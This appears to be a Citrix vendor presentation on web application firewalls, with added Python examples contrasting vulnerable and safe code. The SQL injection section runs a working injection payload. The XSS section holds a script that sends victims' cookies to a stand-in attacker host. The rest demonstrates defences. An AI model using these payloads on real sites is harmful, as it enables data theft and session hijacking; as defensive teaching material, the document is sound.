Protecting Web Application Delivery with Citrix Application Firewall. Johnson Mok Systems Engineer Citrix Systems, Inc.


Six Keys to Successful App Delivery
(Diagram: users on one side, apps on the other, with the Citrix products in between.)
- Citrix NetScaler: deliver Web applications (optimizing Web application delivery)
- Citrix Presentation Server: deliver Windows applications
- Citrix EdgeSight: monitor end-user experience
- Citrix WANScaler: accelerate apps to branch users
- Citrix Access Gateway: enable secure application access
- Citrix Desktop Server: deliver desktops

Agenda
- From Hacker to Criminal Attacks
- Vulnerabilities and Attacks
- Effective Defense
- Your Firewall and IPS Vendor Isn't Telling You
- NetScaler Product Family

Section: From Hacker to Criminal Attacks

Business Impact Is Far Greater
Traditional network attacks:
- Most security products are focused here
- Target is viruses, worms, spam, etc.
- Highly visible, annoying, messy
- Cost is lost productivity and clean-up
Web application attacks:
- Attacks with criminal intent
- Target is the data behind the apps: financial data, identity information
- Financial implication is far bigger

Web Application Attack Trends
Web infrastructure provides a vulnerable link to sensitive data:
- Credit card numbers
- Social Security numbers
- Employee data
- Healthcare records
- Transaction history
The web threat is growing (figures as given on the slide; no source is cited):
- 73% of web vulnerabilities ranked easy to exploit
- 90% increase in reported web attacks last year
- 75% of attacks target application vulnerabilities
Governments act on privacy and security:
- Gramm-Leach-Bliley Act
- California SB 1386
- Basel II
- Information privacy acts

Section: Vulnerabilities and Attacks

Web Application Security: Vulnerability Scorecard
Citrix's coverage claims for the Application Firewall:
- Protects 16 of 16 application vulnerability classes (listed below)
- Protects 10 of 10 of the OWASP Top Ten (Open Web Application Security Project)
- All IIS web vulnerabilities: automatically protected
- All web worms (Code Red, Nimda, ...): automatically protected
Vulnerability classes:
1. Buffer overflow exploits
2. CGI-BIN parameter manipulation
3. Form/hidden field manipulation
4. Forceful browsing
5. Cookie/session poisoning
6. Broken ACLs / weak passwords
7. Cross-site scripting (XSS)
8. Command injection
9. SQL injection
10. Error triggering sensitive information leaks
11. Insecure use of cryptography
12. Server misconfiguration
13. Backdoors and debug options
14. Web-site defacement
15. Well-known platform vulnerabilities
16. Unpublished attacks

What Is an Application Attack?
(Diagram) A malicious but syntactically valid request reaches the web servers; a programming error turns it into a malicious database request; the database answers with the complete customer records.

The Top 3 Web App Attacks
1. Cross-site scripting (77% of sites vulnerable): ID theft, phishing, password stealing
2. Command injection: database theft
3. Web denial of service (WebDoS): online extortion

SQL Injection Attacks: Accessing Databases via Web Applications
Example request: http://shop/index.asp?category=books' or 1=1
SQL injection attack: sending SQL commands to a Web application that, when passed on to the database, execute and allow the attacker to read or change customer and other sensitive information.
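The slide's `category=books' or 1=1` request, carried through in working code. This is an added example, not code from the Citrix deck: the product table, its rows and the handler names are constructed for the example. One caveat on the slide's payload: pasted verbatim it leaves an unbalanced quote at the end of the query (`... = 'books' or 1=1'`), so the working form below closes the string and comments out the remainder, which is what a real attacker sends. The point of the example is that the parameterised handler returns nothing for the same input, with no WAF involved.

```python
"""Added example (not from the Citrix slides): a string-built query versus a
parameterised one, both fed the slide's injection payload. The table and rows
are constructed sample data."""
import sqlite3

# Constructed sample data; the schema and rows are assumptions for this example.
_ROWS = [
    ("books", "Applied Cryptography", 49.95),
    ("books", "The Art of Software Security Assessment", 89.00),
    ("cards", "Customer card on file: 4111 **** **** 1111", 0.0),
]


def _fresh_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (category TEXT, name TEXT, price REAL)")
    conn.executemany("INSERT INTO products VALUES (?, ?, ?)", _ROWS)
    return conn


def vulnerable_search(category: str) -> list[str]:
    """index.asp-style handler: the parameter is pasted into the SQL text, so the
    input can change the structure of the query, not just its value."""
    conn = _fresh_db()
    sql = "SELECT name FROM products WHERE category = '" + category + "'"
    return [row[0] for row in conn.execute(sql)]


def safe_search(category: str) -> list[str]:
    """Same query with a bound parameter: the driver sends the value separately,
    so quotes and keywords inside it are only ever data."""
    conn = _fresh_db()
    sql = "SELECT name FROM products WHERE category = ?"
    return [row[0] for row in conn.execute(sql, (category,))]


# The slide shows category=books' or 1=1. As written that leaves an unbalanced
# quote, so the working form closes the string and comments out the rest:
PAYLOAD = "books' OR 1=1 --"

if __name__ == "__main__":
    print(vulnerable_search("books"))   # the two books, as intended
    print(vulnerable_search(PAYLOAD))   # every row, including the card-on-file record
    print(safe_search(PAYLOAD))         # [] : no category is literally named that
```

The WAF on the slides would block the second call at the request, before the handler runs; the parameterised query removes the bug itself, which is the fix the WAF is buying time for.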

Cross-Site Scripting Attacks: Attacking Trust Relationships
1. The attacker posts <malicious script> to a vulnerable Web application
2. An innocent user downloads the script and executes it
3. The script captures credential information and sends it to the attacker
Cross-site scripting (XSS) attack: inserting a malicious script that enables identity theft by the attacker, compromising the trust relationship between a user and a Web application.
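The three steps above in code, as an added example that is not part of the Citrix deck. The comment text, the attacker host (`attacker.invalid`) and the template functions are constructed for the example. The vulnerable renderer interpolates the posted comment as-is, so every later visitor's browser runs the script and ships `document.cookie` to the attacker; the safe renderer output-encodes the same text and the payload is displayed rather than executed. The cookie helper is the defence-in-depth check a practitioner wants alongside encoding: with HttpOnly set, step 3 cannot read the session cookie even if some other script does run.

```python
"""Added example (not from the Citrix slides): stored XSS rendered by a
vulnerable template and by one that escapes untrusted text. All names and the
attacker host are assumptions for this example."""
import html

# Step 1 of the slide: the attacker posts this as a comment. Constructed payload;
# it sends the victim's cookies to a host the attacker controls.
MALICIOUS_COMMENT = (
    "Nice site!<script>new Image().src="
    "'http://attacker.invalid/c?'+document.cookie</script>"
)


def render_vulnerable(comments: list[str]) -> str:
    """Step 2: the comment lands in the page unchanged, so the browser parses the
    <script> element and runs it in the site's origin."""
    body = "".join(f"<li>{c}</li>" for c in comments)
    return f"<html><body><ul>{body}</ul></body></html>"


def render_safe(comments: list[str]) -> str:
    """Output encoding for an HTML text context: '<', '>', '&' and quotes become
    entities, so the payload is shown as text and never becomes markup."""
    body = "".join(f"<li>{html.escape(c, quote=True)}</li>" for c in comments)
    return f"<html><body><ul>{body}</ul></body></html>"


def contains_executable_script(page: str) -> bool:
    """Crude visibility check for this example only: does a real <script>
    element survive in the rendered page?"""
    return "<script>" in page.lower()


def session_cookie_header(value: str) -> str:
    """Defence in depth: HttpOnly keeps document.cookie from reading the session
    cookie even if a script runs; Secure keeps it off plaintext HTTP."""
    return f"Set-Cookie: session={value}; HttpOnly; Secure; SameSite=Lax"


if __name__ == "__main__":
    print(render_vulnerable([MALICIOUS_COMMENT]))  # script element intact
    print(render_safe([MALICIOUS_COMMENT]))        # &lt;script&gt;... as text
    print(session_cookie_header("3f9a"))
```

`html.escape` is right for text between tags; a value placed inside a JavaScript string, a URL or an attribute needs the encoding for that context instead, which is why a WAF that only looks for `<script>` in requests is a backstop and not the fix.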

Forceful Browsing: Brute-Force Penetration of the Infrastructure
"Blogger Wild Bill Kerr, investigating the Foley scandal: ABC thought it had deleted from the site the AOL screen name of a page who received messages from the congressman. By altering the [web page] address, the blogger gained access to the name, which still existed on an older version of the [site]." (Wall Street Journal, Oct 16, 2006)
Forceful browsing attack: manipulating request URLs to gain access to content you are not entitled to see.

Section: Effective Defense

Defense Strategies
- Do nothing and hope for the best
- Pre-emptive patching against known vulnerabilities
- Reactive patching against unknown/new vulnerabilities
- Server-based protections
- Appliance-based protections

Citrix NetScaler 8.0: Citrix Application Firewall
Effective defense against application-layer attacks:
- Hardened security appliance
- High-performance security for Web and Web Services
- Positive security model: no signatures
- Advanced application learning
- Simple browser-based policy management
- Advanced DDoS protection

Positive Security Offers Zero-Day Defense
- Only legal (safe) client requests are forwarded to the application
- Client requests violating best practices and the HTTP RFCs are blocked
Benefits of positive security:
- No attack signature databases to maintain
- Protects the application and its application logic
- Real-time protection against known and unknown attacks

Defense Demands Full Request Inspection
Looking deeper into every frame: RFC-compliant content can be dangerous. More intelligence yields more defense.
Benefits of comprehensive request inspection:
- Buffer overflow protection
- Cross-site scripting (XSS) protection
- SQL injection protection
- URL mapping eases administration of complex sites
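What "only legal requests are forwarded" looks like when written down, for the positive-security slide above and the full-request-inspection slide: an added example, not Citrix code, and not how the NetScaler profile is actually expressed. The application profile, the shop URLs, the parameter formats and the size limits are all assumptions for the example. There is no signature anywhere in it: the injection and script payloads from the earlier slides are rejected simply because they do not match the format the profile says a `category` or `q` value has, and an oversized header (the classic overflow vector) is rejected on length alone. The flip side is visible too: a legitimate page or parameter the profile does not know about is blocked just the same, which is the false-positive problem the learning slide addresses.

```python
"""Added example (not Citrix code): a minimal positive-security request check.
A request is forwarded only if every part of it matches the application profile;
nothing is matched against an attack signature. Profile and limits are assumed."""
import re
from urllib.parse import parse_qsl, urlsplit

# Application profile for a constructed shop: what a legal request looks like.
PROFILE = {
    "methods": {"GET", "POST"},
    "max_url_len": 2048,
    "max_header_len": 4096,   # oversized headers/fields are the classic overflow vector
    "urls": {
        "/index.asp": {"category": re.compile(r"^[a-z]{1,20}$")},
        "/search":    {"q":        re.compile(r"^[\w .-]{1,64}$")},
        "/cart":      {"item":     re.compile(r"^\d{1,8}$"),
                       "qty":      re.compile(r"^\d{1,3}$")},
    },
}


def check_request(method: str, url: str, headers: dict[str, str]) -> tuple[bool, str]:
    """Return (allowed, reason). The first violation wins; there is no signature
    lookup, so an attack the profile author never heard of fails the same way."""
    if method not in PROFILE["methods"]:
        return False, f"method {method} not in profile"
    if len(url) > PROFILE["max_url_len"]:
        return False, "URL exceeds length limit"
    for name, value in headers.items():
        if len(value) > PROFILE["max_header_len"]:
            return False, f"header {name} exceeds length limit"
    parts = urlsplit(url)
    rules = PROFILE["urls"].get(parts.path)
    if rules is None:
        return False, f"path {parts.path} not in profile"
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        rule = rules.get(name)
        if rule is None:
            return False, f"unexpected parameter {name}"
        if not rule.match(value):
            return False, f"parameter {name} fails format rule"
    return True, "ok"


if __name__ == "__main__":
    for m, u in [("GET", "/index.asp?category=books"),
                 ("GET", "/index.asp?category=books' or 1=1"),
                 ("GET", "/search?q=<script>alert(1)</script>"),
                 ("GET", "/admin/backup.zip"),
                 ("TRACE", "/index.asp")]:
        print(m, u, "->", check_request(m, u, {}))
```

The same check would also reject a new, perfectly legitimate `/checkout` page until someone adds it to the profile; that maintenance cost, not signature freshness, is what a positive model trades for its zero-day coverage.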

Defense Demands Session Awareness and Bi-directional Inspection
- Served content is memorized on a per-session basis
- Client requests that do not match the served content are blocked
Benefits of session awareness:
- Form-field protection
- Forceful browsing protection
- Cookie poisoning protection

Defend Against Encrypted Attacks!
- You cannot defend against what you cannot see
- Encryption is terminated at the firewall
- Optional re-encryption back to the servers
Benefits of SSL decryption and re-encryption:
- Full defense against encrypted attacks
- Increased web infrastructure performance through SSL offload
(Terminating SSL at the firewall makes it the holder of the site's private key and the point where the server certificate is presented; re-encryption to the servers is the option to take when the network behind the firewall is not itself trusted.)

Complex Web Applications Require Learning
Enhancing the positive security model to prevent false positives:
- The positive security model and sessionization ensure that what is served must be returned unmodified
- Modern Web applications serve JavaScript, which intentionally modifies cookies, fields, etc.
- Application learning tunes the positive security model, eliminating false positives by learning the permitted changes
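The session-awareness, forceful-browsing and learning slides describe one mechanism from three angles, so here is one added example covering all three (and the ABC forceful-browsing story earlier in the deck). It is not Citrix code and does not mirror the NetScaler implementation: the HTML page, the cookie format, the session store, the signing key and the learned relaxation are all constructed for the example. The proxy watches the outbound response, records which URLs and hidden form values each session was handed, and on the next inbound request blocks a URL that was never served (the "older version of the site" case), a hidden price that came back changed, or a cookie whose integrity check fails. The `qty` field is listed as a learned relaxation, standing in for a field the page's JavaScript legitimately rewrites; without that entry the legitimate change would be a false positive.

```python
"""Added example (not Citrix code): session-aware, bi-directional enforcement.
Outbound responses are memorised per session; inbound requests must match what
was served. HTML, cookies, store, key and relaxations are constructed assumptions."""
import hashlib
import hmac
import re
from typing import Optional
from urllib.parse import urlsplit

SECRET = b"rotate-me"                # assumed proxy-side key for cookie integrity
START_URLS = {"/", "/login"}         # entry points a session may request unprompted
RELAXATIONS = {("/cart", "qty")}     # learned: the page's JavaScript rewrites qty

_HREF = re.compile(r'href="([^"]+)"')
_FORM = re.compile(r'<form[^>]+action="([^"]+)"[^>]*>(.*?)</form>', re.S)
_HIDDEN = re.compile(r'<input[^>]+type="hidden"[^>]+name="([^"]+)"[^>]+value="([^"]*)"')

# session id -> {"urls": set of served paths, "hidden": {(form action, field): value}}
sessions: dict[str, dict] = {}

# Constructed page the application serves to a logged-in session.
SAMPLE_PAGE = """<html><body>
<a href="/catalog?category=books">Books</a>
<a href="/account">My account</a>
<form action="/cart" method="post">
  <input type="hidden" name="item" value="42">
  <input type="hidden" name="price" value="19.99">
  <input type="hidden" name="qty" value="1">
  <input type="submit" value="Add">
</form>
</body></html>"""


def sign_cookie(sid: str) -> str:
    """Cookie poisoning protection: the proxy appends a MAC the client cannot forge."""
    mac = hmac.new(SECRET, sid.encode(), hashlib.sha256).hexdigest()[:16]
    return f"{sid}.{mac}"


def verify_cookie(cookie: str) -> Optional[str]:
    sid, _, mac = cookie.rpartition(".")
    if sid and hmac.compare_digest(sign_cookie(sid), f"{sid}.{mac}"):
        return sid
    return None


def observe_response(sid: str, html_body: str) -> None:
    """Outbound direction: remember every link and hidden field this session was offered."""
    s = sessions.setdefault(sid, {"urls": set(), "hidden": {}})
    for href in _HREF.findall(html_body):
        s["urls"].add(urlsplit(href).path)
    for action, body in _FORM.findall(html_body):
        s["urls"].add(urlsplit(action).path)
        for name, value in _HIDDEN.findall(body):
            s["hidden"][(action, name)] = value


def check_request(cookie: str, url: str, form: dict[str, str]) -> tuple[bool, str]:
    """Inbound direction: allow only what was served, or a start URL, with an intact cookie."""
    sid = verify_cookie(cookie)
    if sid is None:
        return False, "cookie tampered or forged"
    s = sessions.get(sid, {"urls": set(), "hidden": {}})
    path = urlsplit(url).path
    if path not in START_URLS and path not in s["urls"]:
        return False, f"forceful browsing: {path} was never served to this session"
    for (action, name), served in s["hidden"].items():
        if urlsplit(action).path == path and name in form:
            if form[name] != served and (path, name) not in RELAXATIONS:
                return False, f"hidden field {name} changed from {served!r} to {form[name]!r}"
    return True, "ok"


if __name__ == "__main__":
    c = sign_cookie("s1")
    observe_response("s1", SAMPLE_PAGE)
    print(check_request(c, "/account", {}))                                   # ok
    print(check_request(c, "/account_old", {}))                               # forceful browsing
    print(check_request(c, "/cart", {"item": "42", "price": "0.01", "qty": "1"}))  # field tampering
    print(check_request(c, "/cart", {"item": "42", "price": "19.99", "qty": "3"}))  # relaxed field ok
    print(check_request("s1.0000000000000000", "/account", {}))               # forged cookie
```

Two things the toy makes visible that matter in deployment: the served-content store is per session and grows with every response, so a real appliance bounds it; and every field a page's script is allowed to change needs a relaxation, which is exactly the list that "application learning" on the slide is building.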


Section: Your Firewall and IPS Vendor Isn't Telling You

Traditional Network Security
- Traditional network security is focused on stopping automated attacks such as worms and viruses at the network perimeter
- The goal of these attacks is to disrupt by exploiting known vulnerabilities in known systems
- Traditional security products stop these attacks by creating new signatures each time a new hole is discovered
(Diagram: worms, viruses and network attacks are stopped by network firewalls, IPS and anti-virus in front of the web servers, application servers/packaged apps and database servers, each with its own OS and network.)

The Web Application Threat
- Most targeted hacker activity today, however, focuses on customized web apps, which are extremely hard to write securely
- Traditional methods do little to stop these attacks, since you cannot write patches or signatures for customized code
- These threats are far more dangerous because they give untraceable access to data (financial, identity, credit cards, etc.)
- 75% of targeted attacks now target web applications
(Diagram: the same network firewalls, IPS and anti-virus stop worms, viruses and network attacks, but targeted attacks on customized web applications, customized packaged apps and internally developed web applications pass straight through the web servers, app servers and database servers to the data: "NO SIGNATURES, NO PATCHES".)

Web Application Firewalls
Web application firewalls protect data by blocking known and unknown attacks on the underlying platforms and on customized code.
(Diagram: a web application firewall is added behind the network firewall, IPS and anti-virus and stops the targeted attacks on sensitive data before they reach the customized web applications, app servers and database servers.)

Network Firewalls vs. Application Firewalls: Open for Business = Open to Attack
Network firewalls:
- Protect at Layer 3/4 (addresses and ports)
- Forward approved packets
- Are specifically configured to be open on TCP ports 80/443 (HTTP/HTTPS)
- Have no awareness of HTTP/S sessions
Application firewalls:
- Protect at Layer 7
- Block attacks
- Bi-directional inspection
- Fully session-aware
- Protect web application logic and infrastructure from malicious attacks and erroneous disclosures

IPS/IDS vs. Application Firewalls: Negative Security = Vulnerable on Day Zero
Intrusion detection and intrusion prevention systems (IDS/IPS) compared with application firewalls, point by point:
- Security model: IDS/IPS use a negative model based on signatures; the application firewall's positive model enforces correct behavior
- Zero day: IDS/IPS are vulnerable until a signature exists; the application firewall prevents attacks every day, including day zero
- Sessions: IDS/IPS have no awareness of HTTP/S sessions; the application firewall is aware of URLs, cookies and form fields within a session
- SSL: IDS/IPS typically do no SSL decryption and cannot discover attacks inside SSL sessions; the application firewall decrypts fully and can see all attacks
- Architecture: the application firewall is a full proxy

Customer references (logo slide), by vertical: Financial Services; Insurance (AIG, Guardian); Healthcare; eGovernment; eCommerce
